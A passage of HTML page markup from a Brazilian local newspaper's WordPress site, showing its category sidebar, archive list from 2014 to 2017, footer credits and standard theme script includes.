href="http://oanapolis.com.br/entrevista-com-o-presidente-mishel-temoso/#comment-14302">Entrevista com o Presidente Mishel Teimoso</a></li></ul></aside><aside id="categories-2" class="widget widget_categories"><div class="widget-title-container"><h2 class="widget-title">Categorias</h2></div>		<ul>
	<li class="cat-item cat-item-332"><a href="http://oanapolis.com.br/categoria/classificados/" >Classificados</a>
<ul class='children'>
	<li class="cat-item cat-item-335"><a href="http://oanapolis.com.br/categoria/classificados/diversos/" >Diversos</a>
</li>
	<li class="cat-item cat-item-333"><a href="http://oanapolis.com.br/categoria/classificados/imoveis/" >Imóveis</a>
</li>
	<li class="cat-item cat-item-334"><a href="http://oanapolis.com.br/categoria/classificados/veiculos/" >Veículos</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-336"><a href="http://oanapolis.com.br/categoria/concursos/" >Concursos</a>
<ul class='children'>
	<li class="cat-item cat-item-337"><a href="http://oanapolis.com.br/categoria/concursos/concursos-em-goias/" >Concursos em Goiás</a>
</li>
	<li class="cat-item cat-item-338"><a href="http://oanapolis.com.br/categoria/concursos/concursos-em-outros-estados/" >Concursos em outros estados</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-354"><a href="http://oanapolis.com.br/categoria/de/" >de</a>
</li>
	<li class="cat-item cat-item-326"><a href="http://oanapolis.com.br/categoria/editais/" >Editais</a>
<ul class='children'>
	<li class="cat-item cat-item-330"><a href="http://oanapolis.com.br/categoria/editais/comunicacao/" >Comunicação</a>
</li>
	<li class="cat-item cat-item-329"><a href="http://oanapolis.com.br/categoria/editais/notificacao/" >Notificação</a>
</li>
	<li class="cat-item cat-item-331"><a href="http://oanapolis.com.br/categoria/editais/outros/" >Outros</a>
</li>
	<li class="cat-item cat-item-328"><a href="http://oanapolis.com.br/categoria/editais/proclamas/" >Proclamas</a>
</li>
	<li class="cat-item cat-item-327"><a href="http://oanapolis.com.br/categoria/editais/protesto/" >Protesto</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-353"><a href="http://oanapolis.com.br/categoria/fatos-e-fotos/" >Fatos e Fotos</a>
</li>
	<li class="cat-item cat-item-315"><a href="http://oanapolis.com.br/categoria/noticias/" >Notícias</a>
<ul class='children'>
	<li class="cat-item cat-item-323"><a href="http://oanapolis.com.br/categoria/noticias/brasil/" >Ciências</a>
</li>
	<li class="cat-item cat-item-346"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/" >Colunistas</a>
	<ul class='children'>
	<li class="cat-item cat-item-352"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/anapolis/" >Anápolis</a>
</li>
	<li class="cat-item cat-item-349"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/conta-giro/" >Conta Giro</a>
</li>
	<li class="cat-item cat-item-350"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/dilmar-ferreira/" >Dilmar Ferreira</a>
</li>
	<li class="cat-item cat-item-351"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/dr-benevides/" >Dr. Benevides</a>
</li>
	<li class="cat-item cat-item-348"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/ernani-de-paula/" >Ernani de Paula</a>
</li>
	<li class="cat-item cat-item-347"><a href="http://oanapolis.com.br/categoria/noticias/colunistas/esplanda-mazzini/" >Esplanda &#8211; Mazzini</a>
</li>
	</ul>
</li>
	<li class="cat-item cat-item-324"><a href="http://oanapolis.com.br/categoria/noticias/economia/" >Economia</a>
</li>
	<li class="cat-item cat-item-343"><a href="http://oanapolis.com.br/categoria/noticias/educacao/" >Educação</a>
</li>
	<li class="cat-item cat-item-342"><a href="http://oanapolis.com.br/categoria/noticias/eleicoes-2016/" >Eleições 2016</a>
</li>
	<li class="cat-item cat-item-321"><a href="http://oanapolis.com.br/categoria/noticias/governo-estadial/" >Governo Estadial</a>
</li>
	<li class="cat-item cat-item-320"><a href="http://oanapolis.com.br/categoria/noticias/governo-federal/" >Governo Federal</a>
</li>
	<li class="cat-item cat-item-316"><a href="http://oanapolis.com.br/categoria/noticias/justica/" >Justiça</a>
</li>
	<li class="cat-item cat-item-341"><a href="http://oanapolis.com.br/categoria/noticias/legislativo/" >Legislativo</a>
</li>
	<li class="cat-item cat-item-345"><a href="http://oanapolis.com.br/categoria/noticias/meio-ambiente/" >Meio Ambiente</a>
</li>
	<li class="cat-item cat-item-319"><a href="http://oanapolis.com.br/categoria/noticias/ministerio-publico/" >Ministério Público</a>
</li>
	<li class="cat-item cat-item-322"><a href="http://oanapolis.com.br/categoria/noticias/mundo/" >Mundo</a>
</li>
	<li class="cat-item cat-item-325"><a href="http://oanapolis.com.br/categoria/noticias/outras/" >Outras</a>
</li>
	<li class="cat-item cat-item-317"><a href="http://oanapolis.com.br/categoria/noticias/policia/" >Polícia</a>
</li>
	<li class="cat-item cat-item-318"><a href="http://oanapolis.com.br/categoria/noticias/politica-noticias/" >Política</a>
</li>
	<li class="cat-item cat-item-344"><a href="http://oanapolis.com.br/categoria/noticias/saude/" >Saúde</a>
</li>
	<li class="cat-item cat-item-340"><a href="http://oanapolis.com.br/categoria/noticias/tecnologia/" >Tecnologia</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-308"><a href="http://oanapolis.com.br/categoria/politica/" >Política</a>
</li>
	<li class="cat-item cat-item-1"><a href="http://oanapolis.com.br/categoria/sem-categoria/" >Sem categoria</a>
</li>
		</ul>
</aside><aside id="meta-2" class="widget widget_meta"><div class="widget-title-container"><h2 class="widget-title">Meta</h2></div>			<ul>
			<li><a href="http://oanapolis.com.br/wp-login.php?action=register">Cadastre-se</a></li>			<li><a href="http://oanapolis.com.br/wp-login.php">Fazer login</a></li>
			<li><a href="http://oanapolis.com.br/feed/">Posts <abbr title="Really Simple Syndication">RSS</abbr></a></li>
			<li><a href="http://oanapolis.com.br/comments/feed/"><abbr title="em inglês: Really Simple Syndication">RSS</abbr> dos comentários</a></li>
			<li><a href="https://br.wordpress.org/" title="Powered by WordPress, uma plataforma semântica de vanguarda para publicação pessoal.">WordPress.org</a></li>			</ul>
			</aside></div><!-- #secondary -->
</div><!-- .bootstrap cols -->
</div><!-- .row -->
		</div><!-- container -->
	</div><!-- #content -->

	<footer id="colophon" class="site-footer" role="contentinfo">
		<div class="container">
			<div class="row">
				<div class="footer-widget-area">
					<div class="col-md-4">
						<div class="left-footer">
							<div class="widget-area" role="complementary">
								<aside id="text-5" class="widget widget_text">			<div class="textwidget"></div>
		</aside><aside id="text-4" class="widget widget_text">			<div class="textwidget"></div>
		</aside>							</div><!-- .widget-area -->
						</div>
					</div>
					
					<div class="col-md-4">
						<div class="mid-footer">
							<div class="widget-area" role="complementary">
								<aside id="archives-2" class="widget widget_archive"><h2 class="footer-widget-title">Arquivos</h2>		<ul>
			<li><a href='http://oanapolis.com.br/2017/01/'>janeiro 2017</a>&nbsp;(15)</li>
	<li><a href='http://oanapolis.com.br/2016/12/'>dezembro 2016</a>&nbsp;(91)</li>
	<li><a href='http://oanapolis.com.br/2016/11/'>novembro 2016</a>&nbsp;(75)</li>
	<li><a href='http://oanapolis.com.br/2016/10/'>outubro 2016</a>&nbsp;(55)</li>
	<li><a href='http://oanapolis.com.br/2016/09/'>setembro 2016</a>&nbsp;(62)</li>
	<li><a href='http://oanapolis.com.br/2016/08/'>agosto 2016</a>&nbsp;(56)</li>
	<li><a href='http://oanapolis.com.br/2016/07/'>julho 2016</a>&nbsp;(90)</li>
	<li><a href='http://oanapolis.com.br/2016/06/'>junho 2016</a>&nbsp;(56)</li>
	<li><a href='http://oanapolis.com.br/2016/05/'>maio 2016</a>&nbsp;(40)</li>
	<li><a href='http://oanapolis.com.br/2016/04/'>abril 2016</a>&nbsp;(50)</li>
	<li><a href='http://oanapolis.com.br/2016/03/'>março 2016</a>&nbsp;(82)</li>
	<li><a href='http://oanapolis.com.br/2016/02/'>fevereiro 2016</a>&nbsp;(89)</li>
	<li><a href='http://oanapolis.com.br/2016/01/'>janeiro 2016</a>&nbsp;(68)</li>
	<li><a href='http://oanapolis.com.br/2015/12/'>dezembro 2015</a>&nbsp;(162)</li>
	<li><a href='http://oanapolis.com.br/2015/11/'>novembro 2015</a>&nbsp;(327)</li>
	<li><a href='http://oanapolis.com.br/2015/10/'>outubro 2015</a>&nbsp;(240)</li>
	<li><a href='http://oanapolis.com.br/2015/09/'>setembro 2015</a>&nbsp;(135)</li>
	<li><a href='http://oanapolis.com.br/2015/08/'>agosto 2015</a>&nbsp;(133)</li>
	<li><a href='http://oanapolis.com.br/2015/07/'>julho 2015</a>&nbsp;(98)</li>
	<li><a href='http://oanapolis.com.br/2015/06/'>junho 2015</a>&nbsp;(105)</li>
	<li><a href='http://oanapolis.com.br/2015/05/'>maio 2015</a>&nbsp;(89)</li>
	<li><a href='http://oanapolis.com.br/2015/04/'>abril 2015</a>&nbsp;(94)</li>
	<li><a href='http://oanapolis.com.br/2015/03/'>março 2015</a>&nbsp;(60)</li>
	<li><a href='http://oanapolis.com.br/2015/02/'>fevereiro 2015</a>&nbsp;(47)</li>
	<li><a href='http://oanapolis.com.br/2015/01/'>janeiro 2015</a>&nbsp;(44)</li>
	<li><a href='http://oanapolis.com.br/2014/12/'>dezembro 2014</a>&nbsp;(32)</li>
	<li><a href='http://oanapolis.com.br/2014/11/'>novembro 2014</a>&nbsp;(34)</li>
	<li><a href='http://oanapolis.com.br/2014/10/'>outubro 2014</a>&nbsp;(61)</li>
	<li><a href='http://oanapolis.com.br/2014/09/'>setembro 2014</a>&nbsp;(71)</li>
	<li><a href='http://oanapolis.com.br/2014/08/'>agosto 2014</a>&nbsp;(54)</li>
	<li><a href='http://oanapolis.com.br/2014/07/'>julho 2014</a>&nbsp;(47)</li>
	<li><a href='http://oanapolis.com.br/2014/06/'>junho 2014</a>&nbsp;(75)</li>
	<li><a href='http://oanapolis.com.br/2014/05/'>maio 2014</a>&nbsp;(40)</li>
		</ul>
		</aside>							</div><!-- .widget-area -->						
						</div>
					</div>

					<div class="col-md-4">
						<div class="right-footer">
							<div class="widget-area" role="complementary">
								
															</div><!-- .widget-area -->				
						</div>
					</div>						
				</div><!-- .footer-widget-area -->
			</div><!-- .row -->
		</div><!-- .container -->	

		<div class="footer-site-info">	
			<div class="container">
				<div class="row">
					<div class="col-xs-12 col-md-6 col-sm-6">
						Copyright &#169; 2017 <a href="http://oanapolis.com.br/" title="Jornal O Anápolis" >Jornal O Anápolis</a>.					</div>
					<div class="col-xs-12 col-md-6 col-sm-6 fr">
						<div class="th-copyright">
							Proudly powered by <a href="http://wordpress.org" target="_blank" title="WordPress">WordPress</a>.							<span class="sep"> | </span>
							Theme: Awaken by <a href="http://themezhut.com/themes/awaken" target="_blank" rel="designer">ThemezHut</a>.						</div>
					</div>
				</div><!-- .row -->
			</div><!-- .container -->
		</div><!-- .site-info -->
	</footer><!-- #colophon -->
</div><!-- #page -->

<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/navigation.js?ver=20120206'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/bootstrap.min.js?ver=4.7'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/skip-link-focus-fix.js?ver=20130115'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-includes/js/comment-reply.min.js?ver=4.7'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/jquery.flexslider-min.js?ver=4.7'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-content/themes/awaken/js/awaken.slider.js?ver=4.7'></script>
<script type='text/javascript' src='http://oanapolis.com.br/wp-includes/js/wp-embed.min.js?ver=4.7'></script>

</body>
</html>